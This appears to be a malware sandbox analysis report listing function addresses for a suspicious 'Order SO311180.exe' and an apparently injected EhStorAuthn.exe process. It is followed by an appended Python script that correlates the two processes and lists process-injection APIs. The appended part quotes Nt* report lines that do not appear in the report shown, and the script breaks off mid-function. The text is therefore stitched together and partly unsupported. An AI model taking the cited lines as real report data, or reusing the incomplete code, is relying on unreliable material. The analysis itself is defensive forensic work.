Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F0C68 0_2_0E1F0C68
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F2498 0_2_0E1F2498
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F0830 0_2_0E1F0830
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F2060 0_2_0E1F2060
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 0_2_0E1F3178 0_2_0E1F3178
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00418653 3_2_00418653
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004168A3 3_2_004168A3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00410143 3_2_00410143
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00401100 3_2_00401100
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040E1C3 3_2_0040E1C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004029E0 3_2_004029E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00403370 3_2_00403370
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004024C0 3_2_004024C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0042ECF3 3_2_0042ECF3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004024B5 3_2_004024B5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_00402690 3_2_00402690
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040FF1D 3_2_0040FF1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0040FF23 3_2_0040FF23
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019441A2 3_2_019441A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019501AA 3_2_019501AA
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019481CC 3_2_019481CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880100 3_2_01880100
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01918158 3_2_01918158
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019503E6 3_2_019503E6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E3F0 3_2_0189E3F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194A352 3_2_0194A352
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019102C0 3_2_019102C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01930274 3_2_01930274
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01950591 3_2_01950591
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890535 3_2_01890535
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193E4F6 3_2_0193E4F6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934420 3_2_01934420
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01942446 3_2_01942446
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188C7C0 3_2_0188C7C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4750 3_2_018B4750
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890770 3_2_01890770
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AC6E0 3_2_018AC6E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018929A0 3_2_018929A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0195A9A6 3_2_0195A9A6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018768B8 3_2_018768B8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BE8F0 3_2_018BE8F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189A840 3_2_0189A840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01892840 3_2_01892840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01946BD7 3_2_01946BD7
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194AB40 3_2_0194AB40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A8DBF 3_2_018A8DBF
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188ADE0 3_2_0188ADE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189AD00 3_2_0189AD00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192CD1F 3_2_0192CD1F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01930CB5 3_2_01930CB5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880CF2 3_2_01880CF2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890C00 3_2_01890C00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190EFA0 3_2_0190EFA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01882FC8 3_2_01882FC8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189CFE0 3_2_0189CFE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01932F30 3_2_01932F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D2F28 3_2_018D2F28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B0F30 3_2_018B0F30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01904F40 3_2_01904F40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194CE93 3_2_0194CE93
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2E90 3_2_018A2E90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194EEDB 3_2_0194EEDB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194EE26 3_2_0194EE26
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890E59 3_2_01890E59
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189B1B0 3_2_0189B1B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C516C 3_2_018C516C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187F172 3_2_0187F172
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0195B16B 3_2_0195B16B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018970C0 3_2_018970C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193F0CC 3_2_0193F0CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F0E0 3_2_0194F0E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019470E9 3_2_019470E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D739A 3_2_018D739A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194132D 3_2_0194132D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187D34C 3_2_0187D34C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018952A0 3_2_018952A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AB2C0 3_2_018AB2C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019312ED 3_2_019312ED
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192D5B0 3_2_0192D5B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019595C3 3_2_019595C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947571 3_2_01947571
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F43F 3_2_0194F43F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01881460 3_2_01881460
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194F7B0 3_2_0194F7B0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019416CC 3_2_019416CC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D5630 3_2_018D5630
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01925910 3_2_01925910
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01899950 3_2_01899950
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AB950 3_2_018AB950
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018938E0 3_2_018938E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FD800 3_2_018FD800
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AFB80 3_2_018AFB80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01905BF0 3_2_01905BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018CDBF9 3_2_018CDBF9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FB76 3_2_0194FB76
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D5AA0 3_2_018D5AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01931AA3 3_2_01931AA3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192DAAC 3_2_0192DAAC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193DAC6 3_2_0193DAC6
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947A46 3_2_01947A46
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FA49 3_2_0194FA49
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01903A6C 3_2_01903A6C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AFDC0 3_2_018AFDC0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01893D40 3_2_01893D40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01941D5A 3_2_01941D5A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01947D73 3_2_01947D73
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FCF2 3_2_0194FCF2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01909C32 3_2_01909C32
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01891F92 3_2_01891F92
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FFB1 3_2_0194FFB1
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01853FD5 3_2_01853FD5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01853FD2 3_2_01853FD2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194FF09 3_2_0194FF09
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01899EB0 3_2_01899EB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000535 7_2_05000535
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C0591 7_2_050C0591
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A4420 7_2_050A4420
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B2446 7_2_050B2446
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050AE4F6 7_2_050AE4F6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05024750 7_2_05024750
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000770 7_2_05000770
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFC7C0 7_2_04FFC7C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501C6E0 7_2_0501C6E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509A118 7_2_0509A118
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05088158 7_2_05088158
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C01AA 7_2_050C01AA
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B41A2 7_2_050B41A2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B81CC 7_2_050B81CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05092000 7_2_05092000
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF0100 7_2_04FF0100
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BA352 7_2_050BA352
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C03E6 7_2_050C03E6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500E3F0 7_2_0500E3F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A0274 7_2_050A0274
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050802C0 7_2_050802C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500AD00 7_2_0500AD00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF0CF2 7_2_04FF0CF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509CD1F 7_2_0509CD1F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05018DBF 7_2_05018DBF
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000C00 7_2_05000C00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFADE0 7_2_04FFADE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A0CB5 7_2_050A0CB5
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05042F28 7_2_05042F28
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05020F30 7_2_05020F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A2F30 7_2_050A2F30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05074F40 7_2_05074F40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0507EFA0 7_2_0507EFA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500CFE0 7_2_0500CFE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BEE26 7_2_050BEE26
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF2FC8 7_2_04FF2FC8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05000E59 7_2_05000E59
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05012E90 7_2_05012E90
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BCE93 7_2_050BCE93
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BEEDB 7_2_050BEEDB
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FE68B8 7_2_04FE68B8
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05016962 7_2_05016962
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050029A0 7_2_050029A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050CA9A6 7_2_050CA9A6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500A840 7_2_0500A840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05002840 7_2_05002840
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0502E8F0 7_2_0502E8F0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BAB40 7_2_050BAB40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FFEA80 7_2_04FFEA80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B6BD7 7_2_050B6BD7
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7571 7_2_050B7571
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FF1460 7_2_04FF1460
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509D5B0 7_2_0509D5B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050C95C3 7_2_050C95C3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF43F 7_2_050BF43F
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF7B0 7_2_050BF7B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05045630 7_2_05045630
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B16CC 7_2_050B16CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050CB16B 7_2_050CB16B
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0503516C 7_2_0503516C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0500B1B0 7_2_0500B1B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FEF172 7_2_04FEF172
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050070C0 7_2_050070C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050AF0CC 7_2_050AF0CC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B70E9 7_2_050B70E9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BF0E0 7_2_050BF0E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B132D 7_2_050B132D
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0504739A 7_2_0504739A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050052A0 7_2_050052A0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_04FED34C 7_2_04FED34C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501B2C0 7_2_0501B2C0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A12ED 7_2_050A12ED
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05003D40 7_2_05003D40
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B1D5A 7_2_050B1D5A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7D73 7_2_050B7D73
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501FDC0 7_2_0501FDC0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05079C32 7_2_05079C32
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFCF2 7_2_050BFCF2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFF09 7_2_050BFF09
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05001F92 7_2_05001F92
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFFB1 7_2_050BFFB1
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05009EB0 7_2_05009EB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05095910 7_2_05095910
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05009950 7_2_05009950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501B950 7_2_0501B950
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0506D800 7_2_0506D800
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050038E0 7_2_050038E0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFB76 7_2_050BFB76
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0501FB80 7_2_0501FB80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05075BF0 7_2_05075BF0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0503DBF9 7_2_0503DBF9
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050BFA49 7_2_050BFA49
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B7A46 7_2_050B7A46
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05073A6C 7_2_05073A6C
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05045AA0 7_2_05045AA0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0509DAAC 7_2_0509DAAC
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050A1AA3 7_2_050A1AA3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050ADAC6 7_2_050ADAC6
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B1A00 7_2_030B1A00
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030ACB50 7_2_030ACB50
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AABD0 7_2_030AABD0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AC92A 7_2_030AC92A
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030AC930 7_2_030AC930
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B32B0 7_2_030B32B0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030B5060 7_2_030B5060
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030CB700 7_2_030CB700
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531D778 7_2_0531D778
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E6B3 7_2_0531E6B3
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E1F4 7_2_0531E1F4
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_0531E314 7_2_0531E314
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_053253CD 7_2_053253CD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018C5130 appears 58 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 0190F290 appears 105 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018FEA12 appears 86 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018D7E54 appears 111 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 0187B970 appears 280 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 05035130 appears 58 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 0507F290 appears 105 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 05047E54 appears 111 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 04FEB970 appears 280 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 0506EA12 appears 86 times
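The Nt* functions listed for process 3 (the second Order SO311180.exe instance) and process 7 (EhStorAuthn.exe), the unnamed code functions that follow them, and the string-helper counts above all line up once the process-3 address is subtracted from the process-7 one: NtMapViewOfSection sits at 018C2D10 and 05032D10, the unnamed function at 019441A2 reappears at 050B41A2, and the helper that appears 280 times is at 0187B970 and 04FEB970. The Python script below, an added example that is not part of the report, parses a constructed subset of the report's own lines, votes for that common offset, counts how many stage-3 functions reappear at it in EhStorAuthn.exe, and lists the Nt* APIs that form a write-then-run injection chain. The INJECTION_APIS grouping and the use of image basenames as process keys are the example's own assumptions.

```python
"""Correlate per-process function addresses from the sandbox report.

Added example, not part of the report: it parses the "Code function" and
"String function" lines, checks whether the functions of the second Order
SO311180.exe stage (process 3) reappear in EhStorAuthn.exe (process 7) at one
constant offset, and lists the Nt* APIs that form a process-injection chain.
"""
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of the report's own lines (the process-0 lines,
# i.e. the .NET loader stage, are deliberately left out).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2D10 NtMapViewOfSection, 3_2_018C2D10
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2F60 NtCreateProcessEx, 3_2_018C2F60
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2E30 NtWriteVirtualMemory, 3_2_018C2E30
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2EE0 NtQueueApcThread, 3_2_018C2EE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FB0 NtResumeThread, 3_2_018C2FB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C2FE0 NtCreateFile, 3_2_018C2FE0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019441A2 3_2_019441A2
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 018C5130 appears 58 times
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: String function: 0187B970 appears 280 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034650 NtSuspendThread,LdrInitializeThunk, 7_2_05034650
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05034340 NtSetContextThread,LdrInitializeThunk, 7_2_05034340
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_05032D10
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032F60 NtCreateProcessEx, 7_2_05032F60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032E30 NtWriteVirtualMemory, 7_2_05032E30
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_05032EE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FB0 NtResumeThread,LdrInitializeThunk, 7_2_05032FB0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_05032FE0 NtCreateFile,LdrInitializeThunk, 7_2_05032FE0
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030C8D60 NtCreateFile, 7_2_030C8D60
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_050B41A2 7_2_050B41A2
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 05035130 appears 58 times
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: String function: 04FEB970 appears 280 times
""".strip().splitlines()

CODE_RE = re.compile(r"^Source: (?P<src>.+?) Code function: \d+_\d+_"
                     r"(?P<addr>[0-9A-Fa-f]{8})(?: (?P<api>[A-Za-z]\w*))?")
STR_RE = re.compile(r"^Source: (?P<src>.+?) Code function: String function: "
                    r"(?P<addr>[0-9A-Fa-f]{8}) appears (?P<count>\d+) times")

# Nt* calls that together make up a write-then-run injection chain
# (this grouping is the example's own, not the report's).
INJECTION_APIS = {
    "NtCreateProcessEx", "NtCreateSection", "NtMapViewOfSection",
    "NtUnmapViewOfSection", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
    "NtProtectVirtualMemory", "NtQueueApcThread", "NtGetContextThread",
    "NtSetContextThread", "NtSuspendThread", "NtResumeThread",
}

def image_of(src):
    """Basename of a Source path; the report keys every line by full path."""
    return src.rsplit("\\", 1)[-1]

def parse(lines):
    """Return ({image: [(addr, api or None)]}, {image: [(addr, call_count)]})."""
    funcs, strfuncs = defaultdict(list), defaultdict(list)
    for line in lines:
        if m := STR_RE.match(line):
            strfuncs[image_of(m["src"])].append((int(m["addr"], 16), int(m["count"])))
        elif m := CODE_RE.match(line):
            funcs[image_of(m["src"])].append((int(m["addr"], 16), m["api"]))
    return funcs, strfuncs

def relocation_delta(funcs, src_image, dst_image):
    """Most common (dst - src) offset between same-named APIs, plus how many of
    the source image's functions (named or not) sit at that offset in dst."""
    by_name = defaultdict(list)
    for addr, api in funcs[dst_image]:
        if api:
            by_name[api].append(addr)
    # NtCreateFile has two copies in process 7, so vote instead of trusting one pair
    votes = Counter(d - a for a, api in funcs[src_image] if api
                    for d in by_name.get(api, ()))
    if not votes:
        return None, 0, len(funcs[src_image])
    delta = votes.most_common(1)[0][0]
    dst_addrs = {addr for addr, _ in funcs[dst_image]}
    matched = sum(addr + delta in dst_addrs for addr, _ in funcs[src_image])
    return delta, matched, len(funcs[src_image])

def string_function_deltas(strfuncs, src_image, dst_image):
    """Offsets between string helpers paired by their reported call count."""
    by_count = defaultdict(list)
    for addr, count in strfuncs[dst_image]:
        by_count[count].append(addr)
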